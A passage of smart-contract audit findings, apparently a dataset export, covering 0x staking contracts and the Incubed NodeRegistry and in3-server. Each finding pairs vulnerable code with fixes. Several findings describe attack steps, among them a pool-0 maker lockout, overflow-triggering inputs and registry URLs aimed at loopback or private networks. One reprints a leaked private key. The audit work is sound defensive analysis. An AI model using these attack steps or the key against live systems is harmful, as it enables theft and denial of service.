));\\n}\\n```\\n\\nThe check passes, and the target's `_poolJoinedByMakerAddress` struct is deleted. Additionally, the number of makers in pool 0 is decreased:\\n```\\ndelete \\_poolJoinedByMakerAddress[makerAddress];\\n\\_poolById[poolId].numberOfMakers = uint256(\\_poolById[poolId].numberOfMakers).safeSub(1).downcastToUint32();\\n```\\n\\nThis can be used to prevent any makers from being confirmed into a pool.чSee `issue 5.6`.чч```\\n\\_poolById[poolId].numberOfMakers = uint256(pool.numberOfMakers).safeAdd(1).downcastToUint32();\\n```\\n -MixinParams.setParams bypasses safety checks made by standard StakingProxy upgrade path.чmediumчThe staking contracts use a set of configurable parameters to determine the behavior of various parts of the system. The parameters dictate the duration of epochs, the ratio of delegated stake weight vs operator stake, the minimum pool stake, and the Cobb-Douglas numerator and denominator. These parameters can be configured in two ways:\\n```\\n// Call `init()` on the staking contract to initialize storage.\\n(bool didInitSucceed, bytes memory initReturnData) = stakingContract.delegatecall(\\n abi.encodeWithSelector(IStorageInit(0).init.selector)\\n);\\nif (!didInitSucceed) {\\n assembly {\\n revert(add(initReturnData, 0x20), mload(initReturnData))\\n }\\n}\\n \\n// Assert initialized storage values are valid\\n\\_assertValidStorageParams();\\n```\\n\\nAn authorized address can call `MixinParams.setParams` at any time and set the contract's parameters to arbitrary values.\\nThe latter method introduces the possibility of setting unsafe or nonsensical values for the contract parameters: `epochDurationInSeconds` can be set to 0, `cobbDouglassAlphaNumerator` can be larger than `cobbDouglassAlphaDenominator`, `rewardDelegatedStakeWeight` can be set to a value over 100% of the staking reward, and more.\\nNote, too, that by using `MixinParams.setParams` to set all parameters to 0, the `Staking` contract can be re-initialized by way of `Staking.init`. Additionally, it can be re-attached by way of `StakingProxy.attachStakingContract`, as the delegatecall to `Staking.init` will succeed.чResolution\\nThis is fixed in 0xProject/0x-monorepo#2279. Now the parameter validity is asserted in `setParams()`.\\nEnsure that calls to `setParams` check that the provided values are within the same range currently enforced by the proxy.чч```\\n// Call `init()` on the staking contract to initialize storage.\\n(bool didInitSucceed, bytes memory initReturnData) = stakingContract.delegatecall(\\n abi.encodeWithSelector(IStorageInit(0).init.selector)\\n);\\nif (!didInitSucceed) {\\n assembly {\\n revert(add(initReturnData, 0x20), mload(initReturnData))\\n }\\n}\\n \\n// Assert initialized storage values are valid\\n\\_assertValidStorageParams();\\n```\\n -Authorized addresses can indefinitely stall ZrxVaultBackstop catastrophic failure modeчmediumчThe `ZrxVaultBackstop` contract was added to allow anyone to activate the staking system's “catastrophic failure” mode if the `StakingProxy` is in “read-only” mode for at least 40 days. To enable this behavior, the `StakingProxy` contract was modified to track the last timestamp at which “read-only” mode was activated. This is done by way of StakingProxy.setReadOnlyMode:\\n```\\n/// @dev Set read-only mode (state cannot be changed).\\nfunction setReadOnlyMode(bool shouldSetReadOnlyMode)\\n external\\n onlyAuthorized\\n{\\n // solhint-disable-next-line not-rely-on-time\\n uint96 timestamp = block.timestamp.downcastToUint96();\\n if (shouldSetReadOnlyMode) {\\n stakingContract = readOnlyProxy;\\n readOnlyState = IStructs.ReadOnlyState({\\n isReadOnlyModeSet: true,\\n lastSetTimestamp: timestamp\\n });\\n```\\n\\nBecause the timestamp is updated even if “read-only” mode is already active, any authorized address can prevent `ZrxVaultBackstop` from activating catastrophic failure mode by repeatedly calling `setReadOnlyMode`.чIf “read-only” mode is already active, `setReadOnlyMode(true)` should result in a no-op.чч```\\n/// @dev Set read-only mode (state cannot be changed).\\nfunction setReadOnlyMode(bool shouldSetReadOnlyMode)\\n external\\n onlyAuthorized\\n{\\n // solhint-disable-next-line not-rely-on-time\\n uint96 timestamp = block.timestamp.downcastToUint96();\\n if (shouldSetReadOnlyMode) {\\n stakingContract = readOnlyProxy;\\n readOnlyState = IStructs.ReadOnlyState({\\n isReadOnlyModeSet: true,\\n lastSetTimestamp: timestamp\\n });\\n```\\n -Pool 0 can be used to temporarily prevent makers from joining another poolчmediumч`removeMakerFromStakingPool` reverts if the number of makers currently in the pool is 0, due to `safeSub` catching an underflow:\\n```\\n\\_poolById[poolId].numberOfMakers = uint256(\\_poolById[poolId].numberOfMakers).safeSub(1).downcastToUint32();\\n```\\n\\nBecause of this, edge behavior described in issue 5.6 can allow an attacker to temporarily prevent makers from joining a pool:\\nThe attacker calls `addMakerToStakingPool(NIL_POOL_ID, victimAddress)`. This sets the victim's `MakerPoolJoinStatus.confirmed` field to `true` and increases the number of makers in pool 0 to 1:\\n```\\npoolJoinStatus = IStructs.MakerPoolJoinStatus({\\n poolId: poolId,\\n confirmed: true\\n});\\n\\_poolJoinedByMakerAddress[makerAddress] = poolJoinStatus;\\n\\_poolById[poolId].numberOfMakers = uint256(pool.numberOfMakers).safeAdd(1).downcastToUint32();\\n```\\n\\nThe attacker calls `removeMakerFromStakingPool(NIL_POOL_ID, randomAddress)`. The net effect of this call simply decreases the number of makers in pool 0 by 1, back to 0:\\n```\\ndelete \\_poolJoinedByMakerAddress[makerAddress];\\n\\_poolById[poolId].numberOfMakers = uint256(\\_poolById[poolId].numberOfMakers).safeSub(1).downcastToUint32();\\n```\\n\\nTypically, the victim should be able to remove themselves from pool 0 by calling `removeMakerFromStakingPool(NIL_POOL_ID, victimAddress)`, but because the attacker can set the pool's number of makers to 0, the aforementioned underflow causes this call to fail. The victim must first understand what is happening in `MixinStakingPool` before they are able to remedy the situation:\\nThe victim must call `addMakerToStakingPool(NIL_POOL_ID, randomAddress2)` to increase pool 0's number of makers back to 1.\\nThe victim can now call `removeMakerFromStakingPool(NIL_POOL_ID, victimAddress)`, and remove their confirmed status.\\nAdditionally, if the victim in question currently has a pending join, the attacker can use issue 5.1 to first remove their pending status before locking them in pool 0.чSee issue 5.1.чч```\\n\\_poolById[poolId].numberOfMakers = uint256(\\_poolById[poolId].numberOfMakers).safeSub(1).downcastToUint32();\\n```\\n -Recommendation: Fix weak assertions in MixinStakingPool stemming from use of NIL_POOL_IDчmediumчThe modifier `onlyStakingPoolOperatorOrMaker(poolId)` is used to authorize actions taken on a given pool. The sender must be either the operator or a confirmed maker of the pool in question. However, the modifier queries `getStakingPoolIdOfMaker(maker)`, which returns `NIL_POOL_ID` if the maker's `MakerPoolJoinStatus` struct is not confirmed. This implicitly makes anyone a maker of the nonexistent “pool 0”:\\n```\\nfunction getStakingPoolIdOfMaker(address makerAddress)\\n public\\n view\\n returns (bytes32)\\n{\\n IStructs.MakerPoolJoinStatus memory poolJoinStatus = \\_poolJoinedByMakerAddress[makerAddress];\\n if (poolJoinStatus.confirmed) {\\n return poolJoinStatus.poolId;\\n } else {\\n return NIL\\_POOL\\_ID;\\n }\\n}\\n```\\n\\n`joinStakingPoolAsMaker(poolId)` makes no existence checks on the provided pool id, and allows makers to become pending makers in nonexistent pools.\\n`addMakerToStakingPool(poolId, maker)` makes no existence checks on the provided pool id, allowing makers to be added to nonexistent pools (as long as the sender is an operator or maker in the pool).чAvoid use of `0x00...00` for `NIL_POOL_ID`. Instead, use `2**256 - 1`.\\nImplement stronger checks for pool existence. Each time a pool id is supplied, it should be checked that the pool id is between 0 and `nextPoolId`.\\n`onlyStakingPoolOperatorOrMaker` should revert if `poolId` == `NIL_POOL_ID` or if `poolId` is not in the valid range: (0, nextPoolId).чч```\\nfunction getStakingPoolIdOfMaker(address makerAddress)\\n public\\n view\\n returns (bytes32)\\n{\\n IStructs.MakerPoolJoinStatus memory poolJoinStatus = \\_poolJoinedByMakerAddress[makerAddress];\\n if (poolJoinStatus.confirmed) {\\n return poolJoinStatus.poolId;\\n } else {\\n return NIL\\_POOL\\_ID;\\n }\\n}\\n```\\n -LibFixedMath functions fail to catch a number of overflowsчmediumчThe `__add()`, `__mul()`, and `__div()` functions perform arithmetic on 256-bit signed integers, and they all miss some specific overflows.\\nAddition Overflows\\n```\\n/// @dev Adds two numbers, reverting on overflow.\\nfunction \\_add(int256 a, int256 b) private pure returns (int256 c) {\\n c = a + b;\\n if (c > 0 && a < 0 && b < 0) {\\n LibRichErrors.rrevert(LibFixedMathRichErrors.BinOpError(\\n LibFixedMathRichErrors.BinOpErrorCodes.SUBTRACTION\\_OVERFLOW,\\n a,\\n b\\n ));\\n }\\n if (c < 0 && a > 0 && b > 0) {\\n LibRichErrors.rrevert(LibFixedMathRichErrors.BinOpError(\\n LibFixedMathRichErrors.BinOpErrorCodes.ADDITION\\_OVERFLOW,\\n a,\\n b\\n ));\\n }\\n}\\n```\\n\\nThe two overflow conditions it tests for are:\\nAdding two positive numbers shouldn't result in a negative number.\\nAdding two negative numbers shouldn't result in a positive number.\\n`__add(-2**255, -2**255)` returns `0` without reverting because the overflow didn't match either of the above conditions.\\nMultiplication Overflows\\n```\\n/// @dev Returns the multiplication two numbers, reverting on overflow.\\nfunction \\_mul(int256 a, int256 b) private pure returns (int256 c) {\\n if (a == 0) {\\n return 0;\\n }\\n c = a \\* b;\\n if (c / a != b) {\\n LibRichErrors.rrevert(LibFixedMathRichErrors.BinOpError(\\n LibFixedMathRichErrors.BinOpErrorCodes.MULTIPLICATION\\_OVERFLOW,\\n a,\\n b\\n ));\\n }\\n}\\n```\\n\\nThe function checks via division for most types of overflows, but it fails to catch one particular case. `__mul(-2**255, -1)` returns `-2**255` without error.\\nDivision Overflows\\n```\\n/// @dev Returns the division of two numbers, reverting on division by zero.\\nfunction \\_div(int256 a, int256 b) private pure returns (int256 c) {\\n if (b == 0) {\\n LibRichErrors.rrevert(LibFixedMathRichErrors.BinOpError(\\n LibFixedMathRichErrors.BinOpErrorCodes.DIVISION\\_BY\\_ZERO,\\n a,\\n b\\n ));\\n }\\n c = a / b;\\n}\\n```\\n\\nIt does not check for overflow. Due to this, `__div(-2**255, -1)` erroneously returns `-2**255`.чFor addition, the specific case of `__add(-2**255, -2**255)` can be detected by using a `>= 0` check instead of `> 0`, but the below seems like a clearer check for all cases:\\n```\\n// if b is negative, then the result should be less than a\\nif (b < 0 && c >= a) { /\\* subtraction overflow \\*/ }\\n\\n// if b is positive, then the result should be greater than a\\nif (b > 0 && c <= a) { /\\* addition overflow \\*/ }\\n```\\n\\nFor multiplication and division, the specific values of `-2**255` and `-1` are the only missing cases, so that can be explicitly checked in the `__mul()` and `__div()` functions.чч```\\n/// @dev Adds two numbers, reverting on overflow.\\nfunction \\_add(int256 a, int256 b) private pure returns (int256 c) {\\n c = a + b;\\n if (c > 0 && a < 0 && b < 0) {\\n LibRichErrors.rrevert(LibFixedMathRichErrors.BinOpError(\\n LibFixedMathRichErrors.BinOpErrorCodes.SUBTRACTION\\_OVERFLOW,\\n a,\\n b\\n ));\\n }\\n if (c < 0 && a > 0 && b > 0) {\\n LibRichErrors.rrevert(LibFixedMathRichErrors.BinOpError(\\n LibFixedMathRichErrors.BinOpErrorCodes.ADDITION\\_OVERFLOW,\\n a,\\n b\\n ));\\n }\\n}\\n```\\n -Misleading MoveStake event when moving stake from UNDELEGATED to UNDELEGATEDчlowчAlthough moving stake between the same status (UNDELEGATED <=> UNDELEGATED) should be a no-op, calls to `moveStake` succeed even for invalid `amount` and nonsensical `poolId`. The resulting `MoveStake` event can log garbage, potentially confusing those observing events.\\nWhen moving between `UNDELEGATED` and `UNDELEGATED`, each check and function call results in a no-op, save the final event:\\nNeither `from` nor `to` are `StakeStatus.DELEGATED`, so these checks are passed:\\n```\\nif (from.status == IStructs.StakeStatus.DELEGATED) {\\n \\_undelegateStake(\\n from.poolId,\\n staker,\\n amount\\n );\\n}\\n \\nif (to.status == IStructs.StakeStatus.DELEGATED) {\\n \\_delegateStake(\\n to.poolId,\\n staker,\\n amount\\n );\\n}\\n```\\n\\nThe primary state changing function, `_moveStake`, immediately returns because the `from` and `to` balance pointers are equivalent:\\n```\\nif (\\_arePointersEqual(fromPtr, toPtr)) {\\n return;\\n}\\n```\\n\\nFinally, the `MoveStake` event is invoked, which can log completely invalid values for `amount`, `from.poolId`, and to.poolId:\\n```\\nemit MoveStake(\\n staker,\\n amount,\\n uint8(from.status),\\n from.poolId,\\n uint8(to.status),\\n to.poolId\\n);\\n```\\nчIf `amount` is 0 or if moving between `UNDELEGATED` and `UNDELEGATED`, this function should no-op or revert. An explicit check for this case should be made near the start of the function.чч```\\nif (from.status == IStructs.StakeStatus.DELEGATED) {\\n \\_undelegateStake(\\n from.poolId,\\n staker,\\n amount\\n );\\n}\\n \\nif (to.status == IStructs.StakeStatus.DELEGATED) {\\n \\_delegateStake(\\n to.poolId,\\n staker,\\n amount\\n );\\n}\\n```\\n -Remove unneeded fields from StoredBalance and Pool structsчlowчResolution\\nThis is fixed in 0xProject/0x-monorepo#2248. As part of a larger refactor, these fields were removed.\\nBoth structs have fields that are only written to, and never read:\\nStoredBalance.isInitialized:\\n```\\nbool isInitialized;\\n```\\n\\nPool.initialized:\\n```\\nbool initialized;\\n```\\nчThe unused fields should be removed.чч```\\nbool isInitialized;\\n```\\n -Pool IDs can just be incrementing integersчlowчPool IDs are currently `bytes32` values that increment by `2**128`. After discussion with the development team, it seems that this was in preparation for a feature that was ultimately not used. Pool IDs should instead just be incrementing integers.\\n```\\n// The upper 16 bytes represent the pool id, so this would be pool id 1. See MixinStakinPool for more information.\\nbytes32 constant internal INITIAL\\_POOL\\_ID = 0x0000000000000000000000000000000100000000000000000000000000000000;\\n\\n// The upper 16 bytes represent the pool id, so this would be an increment of 1. See MixinStakinPool for more information.\\nuint256 constant internal POOL\\_ID\\_INCREMENT\\_AMOUNT = 0x0000000000000000000000000000000100000000000000000000000000000000;\\n```\\n\\n```\\n/// @dev Computes the unique id that comes after the input pool id.\\n/// @param poolId Unique id of pool.\\n/// @return Next pool id after input pool.\\nfunction \\_computeNextStakingPoolId(bytes32 poolId)\\n internal\\n pure\\n returns (bytes32)\\n{\\n return bytes32(uint256(poolId).safeAdd(POOL\\_ID\\_INCREMENT\\_AMOUNT));\\n}\\n```\\nчResolution\\nThis is fixed in 0xProject/0x-monorepo#2250. Pool IDs now start at 1 and increment by 1 each time.\\nMake pool IDs `uint256` values and simply add 1 to generate the next ID.чч```\\n// The upper 16 bytes represent the pool id, so this would be pool id 1. See MixinStakinPool for more information.\\nbytes32 constant internal INITIAL\\_POOL\\_ID = 0x0000000000000000000000000000000100000000000000000000000000000000;\\n\\n// The upper 16 bytes represent the pool id, so this would be an increment of 1. See MixinStakinPool for more information.\\nuint256 constant internal POOL\\_ID\\_INCREMENT\\_AMOUNT = 0x0000000000000000000000000000000100000000000000000000000000000000;\\n```\\n -LibProxy.proxyCall() may overwrite important memoryчlowч`LibProxy.proxyCall()` copies from call data to memory, starting at address 0:\\n```\\nassembly {\\n // store selector of destination function\\n let freeMemPtr := 0\\n if gt(customEgressSelector, 0) {\\n mstore(0x0, customEgressSelector)\\n freeMemPtr := add(freeMemPtr, 4)\\n }\\n\\n // adjust the calldata offset, if we should ignore the selector\\n let calldataOffset := 0\\n if gt(ignoreIngressSelector, 0) {\\n calldataOffset := 4\\n }\\n\\n // copy calldata to memory\\n calldatacopy(\\n freeMemPtr,\\n calldataOffset,\\n calldatasize()\\n )\\n```\\n\\nThe first 64 bytes of memory are treated as “scratch space” by the Solidity compiler. Writing beyond that point is dangerous, as it will overwrite the free memory pointer and the “zero slot” which is where length-0 arrays point.\\nAlthough the current callers of `proxyCall()` don't appear to use any memory after calling `proxyCall()`, future changes to the code may introduce very serious and subtle bugs due to this unsafe handling of memory.чUse the actual free memory pointer to determine where it's safe to write to memory.чч```\\nassembly {\\n // store selector of destination function\\n let freeMemPtr := 0\\n if gt(customEgressSelector, 0) {\\n mstore(0x0, customEgressSelector)\\n freeMemPtr := add(freeMemPtr, 4)\\n }\\n\\n // adjust the calldata offset, if we should ignore the selector\\n let calldataOffset := 0\\n if gt(ignoreIngressSelector, 0) {\\n calldataOffset := 4\\n }\\n\\n // copy calldata to memory\\n calldatacopy(\\n freeMemPtr,\\n calldataOffset,\\n calldatasize()\\n )\\n```\\n -NodeRegistry - URL can be arbitrary dns resolvable names, IP's and even localhost or private subnetsчhighчAs outlined in issue 6.9 the `NodeRegistry` allows anyone to register nodes with arbitrary URLs. The `url` is then used by `in3-server` or clients to connect to other nodes in the system. Signers can only be convicted if they sign wrong blockhashes. However, if they never provide any signatures they can stay in the registry for as long as they want and sabotage the network. The Registry implements an admin functionality that is available for the first year to remove misbehaving nodes (or spam entries) from the Registry. However, this is insufficient as an attacker might just re-register nodes after the minimum timeout they specify or spend some more finneys on registering more nodes. Depending on the eth-price this will be more or less profitable.\\nFrom an attackers perspective the `NodeRegistry` is a good source of information for reconnaissance, allows to de-anonymize and profile nodes based on dns entries or netblocks or responses to `in3_stats` (https://github.com/ConsenSys/slockit-in3-audit-2019-09/issues/49), makes a good list of target for DoS attacks on the system or makes it easy to exploit nodes for certain yet unknown security vulnerabilities.\\nSince nodes and potentially clients (not in scope) do not validate the rpc URL received from the `NodeRegistry` they will try to connect to whatever is stored in a nodes `url` entry.\\ncode/in3-server/src/chains/signatures.ts:L58-L75\\n```\\nconst config = nodes.nodes.find(\\_ => \\_.address.toLowerCase() === adr.toLowerCase())\\nif (!config) // TODO do we need to throw here or is it ok to simply not deliver the signature?\\n throw new Error('The ' + adr + ' does not exist within the current registered active nodeList!')\\n\\n// get cache signatures and remaining blocks that have no signatures\\nconst cachedSignatures: Signature[] = []\\nconst blocksToRequest = blocks.filter(b => {\\n const s = signatureCaches.get(b.hash) && false\\n return s ? cachedSignatures.push(s) \\* 0 : true\\n})\\n\\n// send the sign-request\\nlet response: RPCResponse\\ntry {\\n response = (blocksToRequest.length\\n ? await handler.transport.handle(config.url, { id: handler.counter++ || 1, jsonrpc: '2.0', method: 'in3\\_sign', params: blocksToRequest })\\n : { result: [] }) as RPCResponse\\n if (response.error) {\\n```\\n\\nThis allows for a wide range of attacks not limited to:\\nAn attacker might register a node with an empty or invalid URL. The `in3-server` does not validate the URL and therefore will attempt to connect to the invalid URL, spending resources (cpu, file-descriptors, ..) to find out that it is invalid.\\nAn attacker might register a node with a URL that is pointing to another node's rpc endpoint and specify weights that suggest that it is capable of service a lot of requests to draw more traffic towards that node in an attempt to cause a DoS situation.\\nAn attacker might register a node for a http/https website at any port in an extortion attempt directed to website owners. The incubed network nodes will have to learn themselves that the URL is invalid and they will at least attempt to connect the website once.\\nAn attacker might update the node information in the `NodeRegistry` for a specific node every block, providing a new `url` (or a slightly different URLs issue 6.9) to avoid client/node URL blacklists.\\nAn attacker might provide IP addresses instead of DNS resolvable names with the `url` in an attempt to draw traffic to targets, avoiding canonicalization and blacklisting features.\\nAn attacker might provide a URL that points to private IP netblocks for IPv4 or IPv6 in various formats. Combined with the ability to ask another node to connect to an attacker defined `url` (via blockproof, signatures[] -> signer_address -> signer.url) this might allow an attacker to enumerate services in the LAN of node operators.\\nAn attacker might provide the loopback IPv4, IPv6 or resolvable name as the URL in an attempt to make the node connect to local loopback services (service discovery, bypassing authentication for some local running services - however this is very limited to the requests nodes may execute).\\nURLs may be provided in various formats: resolvable dns names, IPv4, IPv6 and depending on the http handler implementation even in Decimal, Hex or Octal form (i.e. http://2130706433/)\\nA valid DNS resolvable name might point to a localhost or private IP netblock.\\nSince none of the rpc endpoints provide signatures they cannot be convicted or removed (unless the `unregisterKey` does it within the first year. However, that will not solve the problem that someone can re-register the same URLs over and over again)чResolution\\nThis issue has been addressed with the following commits:\\nIt is a design decision to base the Node registry on URLs (DNS resolvable names). This has the implications outlined in this issue and they cannot easily be mitigated. Adding a delay until nodes can be used after registration only delays the problem. Assuming that an entity curates the registry or a whitelist is in place centralizes the system. Adding DNS record verification still allows an owner of a DNS entry to point its name to any IP address they would like it to point to. It certainly makes it harder to add RPC URLs with DNS names that are not in control of the attacker but it also adds a whole lot more complexity to the system (including manual steps performed by the node operator). In the end, the system allows IP based URLs in the registry which cannot be used for DNS validation.\\nIt is a fundamental design decision of the system architecture to allow rpc urls in the Node Registry, therefore this issue can only be partially mitigated unless the system design is reworked. It is therefore suggested to add checks to both the registry contract (coarse validation to avoid adding invalid urls) and node implementations (rigorous validation of URL's and resolved IP addresses) and filter out any potentially harmful destinations.чч```\\nconst config = nodes.nodes.find(\\_ => \\_.address.toLowerCase() === adr.toLowerCase())\\nif (!config) // TODO do we need to throw here or is it ok to simply not deliver the signature?\\n throw new Error('The ' + adr + ' does not exist within the current registered active nodeList!')\\n\\n// get cache signatures and remaining blocks that have no signatures\\nconst cachedSignatures: Signature[] = []\\nconst blocksToRequest = blocks.filter(b => {\\n const s = signatureCaches.get(b.hash) && false\\n return s ? cachedSignatures.push(s) \\* 0 : true\\n})\\n\\n// send the sign-request\\nlet response: RPCResponse\\ntry {\\n response = (blocksToRequest.length\\n ? await handler.transport.handle(config.url, { id: handler.counter++ || 1, jsonrpc: '2.0', method: 'in3\\_sign', params: blocksToRequest })\\n : { result: [] }) as RPCResponse\\n if (response.error) {\\n```\\n -in3-server - key management PendingчhighчSecure and efficient key management is a challenge for any cryptographic system. Incubed nodes for example require an account on the ethereum blockchain to actively participate in the incubed network. The account and therefore a private-key is used to sign transactions on the ethereum blockchain and to provide signed proofs to other in3-nodes.\\nThis means that an attacker that is able to discover the keys used by an `in3-server` by any mechanism may be able to impersonate that node, steal the nodes funds or sign wrong data on behalf of the node which might also lead to a loss of funds.\\nThe private key for the `in3-server` can be specified in a configuration file called `config.json` residing in the program working dir. Settings from the `config.json` can be overridden via command-line options. The application keeps configuration parameters available internally in an `IN3RPCConfig` object and passes this object as an initialization parameter to other objects.\\nThe key can either be provided in plaintext as a hex-string starting with `0x` or within an ethereum keystore format compatible protected keystore file. Either way it is provided it will be held in plaintext in the object.\\nThe application accepts plaintext private keys and the keys are stored unprotected in the applications memory in JavaScript objects. The `in3-server` might even re-use the nodes private key which may weaken the security provided by the node. The repository leaks a series of presumably ‘test private keys' and the default config file already comes with a private key set that might be shared across unvary users that fail to override it.\\ncode/in3-server/config.json:L1-L4\\n```\\n{\\n \"privateKey\": \"0xc858a0f49ce12df65031ba0eb0b353abc74f93f8ccd43df9682fd2e2293a4db3\",\\n \"rpcUrl\": \"http://rpc-kovan.slock.it\"\\n}\\n```\\n\\ncode/in3-server/package.json:L20-L31\\nThe private key is also passed as arguments to other functions. In error cases these may leak the private key to log interfaces or remote log aggregation instances (sentry). See `txargs.privateKey` in the example below:\\ncode/in3-server/src/util/tx.ts:L100-L100\\n```\\nconst key = toBuffer(txargs.privateKey)\\n```\\n\\ncode/in3-server/src/util/tx.ts:L134-L140\\n```\\nconst txHash = await transport.handle(url, {\\n jsonrpc: '2.0',\\n id: idCount++,\\n method: 'eth\\_sendRawTransaction',\\n params: [toHex(tx.serialize())]\\n}).then((\\_: RPCResponse) => \\_.error ? Promise.reject(new SentryError('Error sending tx', 'tx\\_error', 'Error sending the tx ' + JSON.stringify(txargs) + ':' + JSON.stringify(\\_.error))) as any : \\_.result + '')\\n```\\nчResolution\\nThe breakdown of the fixes addressed with git.slock.it/PR/13 are as follows:\\nKeys should never be stored or accepted in plaintext format Keys should only be accepted in an encrypted and protected format\\nThe private key in `code/in3-server/config.json` has been removed. The repository still contains private keys at least in the following locations:\\n`package.json`\\n`vscode/launch.json`\\n`example_docker-compose.yml`\\nNote that private keys indexed by a git repository can be restored from the repository history.\\nThe following statement has been provided to address this issue:\\nWe have removed all examples and usage of plain private keys and replaced them with json-keystore files. Also in the documentation we added warnings on how to deal with keys, especially with hints to the bash history or enviroment\\n\\nA single key should be used for only one purpose. Keys should not be shared.\\nThe following statement has been provided to address this issue:\\nThis is why we seperated the owner and signer-key. This way you can use a multisig to securly protect the owner-key. The signer-key is used to sign blocks (and convict) and is not able to do anything else (not even changing its own url)\\n\\nThe application should support developers in understanding where cryptographic keys are stored within the application as well as in which memory regions they might be accessible for other applications\\nAddressed by wrapping the private key in an object that stores the key in encrypted form and only decrypts it when signing. The key is cleared after usage. The IN3-server still allows raw private keys to be configured. A warning is printed if that is the case. The loaded raw private key is temporarily assigned to a local variable and not explicitly cleared by the method.\\nWhile we used to keep the unlocked key as part of the config, we have now removed the key from the config and store them in a special signer-function.\\nhttps://git.slock.it/in3/ts/in3-server/merge_requests/113\\n\\nKeys should be protected in memory and only decrypted for the duration of time they are actively used. Keys should not be stored with the applications source-code repository\\nsee previous remediation note.\\nAfter unlocking the signer key, we encrypt it again and keep it encrypted only decrypting it when signing. This way the raw private key only exist for a very short time in memory and will be filled with 0 right after. ( https://git.slock.it/in3/ts/in3-server/merge_requests/113/diffs#653b04fa41e35b55181776b9f14620b661cff64c_54_73 )\\n\\nUse standard libraries for cryptographic operations\\nThe following statement has been provided to address this issue\\nWe are using ethereumjs-libs.\\n\\nUse the system keystore and API to sign and avoid to store key material at all\\nThe following statement has been provided to address this issue\\nWe are looking into using different signer-apis, even supporting hardware-modules like HSMs. But this may happen in future releases.\\n\\nThe application should store the keys eth-address (util.getAddress()) instead of re-calculating it multiple times from the private key.\\nFixed by generating the address for a private key once and storing it in a private key wrapper object.\\n\\nDo not leak credentials and key material in debug-mode, to local log-output or external log aggregators.\\n`txArgs` still contains a field `privateKey` as outlined in the issue description. However, this `privateKey` now represents the wrapper object noted in a previous comment which only provides access to the ETH address generated from the raw private key.\\nThe following statement has been provided to address this issue:\\nsince the private key and the passphrase are actually deleted from the config, logoutputs or even debug will not be able to leak this information.\\nKeys should never be stored or accepted in plaintext format.\\nKeys should not be stored in plaintext on the file-system as they might easily be exposed to other users. Credentials on the file-system must be tightly restricted by access control.\\nKeys should not be provided as plaintext via environment variables as this might make them available to other processes sharing the same environment (child-processes, e.g. same shell session)\\nKeys should not be provided as plaintext via command-line arguments as they might persist in the shell's command history or might be available to privileged system accounts that can query other processes startup parameters.\\nKeys should only be accepted in an encrypted and protected format.\\nA single key should be used for only one purpose. Keys should not be shared.\\nThe use of the same key for two different cryptographic processes may weaken the security provided by one or both of the processes.\\nThe use of the same key for two different applications may weaken the security provided by one or both of the applications.\\nLimiting the use of a key limits the damage that could be done if the key is compromised.\\nNode owners keys should not be re-used as signer keys.\\nThe application should support developers in understanding where cryptographic keys are stored within the application as well as in which memory regions they might be accessible for other applications.\\nKeys should be protected in memory and only decrypted for the duration of time they are actively used.\\nKeys should not be stored with the applications source-code repository.\\nUse standard libraries for cryptographic operations.\\nUse the system keystore and API to sign and avoid to store key material at all.\\nThe application should store the keys eth-address (util.getAddress()) instead of re-calculating it multiple times from the private key.\\nDo not leak credentials and key material in debug-mode, to local log-output or external log aggregators.чч```\\n{\\n \"privateKey\": \"0xc858a0f49ce12df65031ba0eb0b353abc74f93f8ccd43df9682fd2e2293a4db3\",\\n \"rpcUrl\": \"http://rpc-kovan.slock.it\"\\n}\\n```\\n -NodeRegistry - Multiple nodes can share slightly different RPC URLчhighчOne of the requirements for Node registration is to have a unique URL which is not already used by a different owner. The uniqueness check is done by hashing the provided `_url` and checking if someone already registered with that hash of `_url`.\\nHowever, byte-equality checks (via hashing in this case) to enforce uniqueness will not work for URLs. For example, while the following URLs are not equal and will result in different `urlHashes` they can logically be the same end-point:\\n`https://some-server.com/in3-rpc`\\n`https://some-server.com:443/in3-rpc`\\n`https://some-server.com/in3-rpc/`\\n`https://some-server.com/in3-rpc///`\\n`https://some-server.com/in3-rpc?something`\\n`https://some-server.com/in3-rpc?something&something`\\n`https://www.some-server.com/in3-rpc?something` (if www resolves to the same ip)\\n```\\nbytes32 urlHash = keccak256(bytes(\\_url));\\n\\n// make sure this url and also this owner was not registered before.\\n// solium-disable-next-line\\nrequire(!urlIndex[urlHash].used && signerIndex[\\_signer].stage == Stages.NotInUse,\\n \"a node with the same url or signer is already registered\");\\n```\\n\\nThis leads to the following attack vectors:\\nA user signs up multiple nodes that resolve to the same end-point (URL). A minimum deposit of `0.01 ether` is required for each registration. Registering multiple nodes for the same end-point might allow an attacker to increase their chance of being picked to provide proofs. Registering multiple nodes requires unique `signer` addresses per node.\\nAlso one node can have multiple accounts, hence one node can have slightly different URL and different accounts as the signers.\\nDoS - A user might register nodes for URLs that do not serve in3-clients in an attempt to DDoS e.g. in an attempt to extort web-site operators. This is kind of a reflection attack where nodes will request other nodes from the contract and try to contact them over RPC. Since it is http-rpc it will consume resources on the receiving end.\\nDoS - A user might register Nodes with RPC URLs of other nodes, manipulating weights to cause more traffic than the node can actually handle. Nodes will try to communicate with that node. If no proof is requested the node will not even know that someone else signed up other nodes with their RPC URL to cause problems. If they request proof the original `signer` will return a signed proof and the node will fail due to a signature mismatch. However, the node cannot be convicted and therefore forced to lose the deposit as conviction is bound the `signer` and the block was not signed by the rogue node entry. There will be no way to remove the node from the registry other than the admin functionality.чCanonicalize URLs, but that will not completely prevent someone from registering nodes for other end-points or websites. Nodes can be removed by an admin in the first year but not after that. Rogue owners cannot be prevented from registering random nodes with high weights and minimum deposit. They cannot be convicted as they do not serve proofs. Rogue owners can still unregister to receive their deposit after messing with the system.чч```\\nbytes32 urlHash = keccak256(bytes(\\_url));\\n\\n// make sure this url and also this owner was not registered before.\\n// solium-disable-next-line\\nrequire(!urlIndex[urlHash].used && signerIndex[\\_signer].stage == Stages.NotInUse,\\n \"a node with the same url or signer is already registered\");\\n```\\n -Impossible to remove malicious nodes after the initial periodчmediumчThe system has centralized power structure for the first year after deployment. An `unregisterKey` (creator of the contract) is allowed to remove Nodes that are in state `Stages.Active` from the registry, only in 1st year.\\nHowever, there is no possibility to remove malicious nodes from the registry after that.\\n```\\n/// @dev only callable in the 1st year after deployment\\nfunction removeNodeFromRegistry(address \\_signer)\\n external\\n onlyActiveState(\\_signer)\\n{\\n\\n // solium-disable-next-line security/no-block-members\\n require(block.timestamp < (blockTimeStampDeployment + YEAR\\_DEFINITION), \"only in 1st year\");// solhint-disable-line not-rely-on-time\\n require(msg.sender == unregisterKey, \"only unregisterKey is allowed to remove nodes\");\\n\\n SignerInformation storage si = signerIndex[\\_signer];\\n In3Node 